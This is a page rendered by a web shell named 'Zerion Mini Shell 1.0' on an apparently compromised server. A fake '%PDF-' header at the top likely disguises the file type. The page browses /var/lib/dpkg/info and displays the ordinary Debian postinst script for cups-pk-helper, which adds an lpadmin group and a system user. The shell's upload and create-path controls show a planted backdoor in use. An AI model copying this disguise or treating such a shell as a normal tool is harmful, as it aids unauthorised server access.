%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/lib/dpkg/info/
Upload File :
Create Path :
Current File : /var/lib/dpkg/info/cups-pk-helper.postinst

#!/bin/sh

set -e

case "$1" in
	configure)
		if ! getent group lpadmin > /dev/null; then
			addgroup --quiet --system lpadmin
		fi

		adduser --system --no-create-home --quiet --gecos "user for cups-pk-helper service" \
			--ingroup lpadmin cups-pk-helper
		;;
esac



exit 0

Zerion Mini Shell 1.0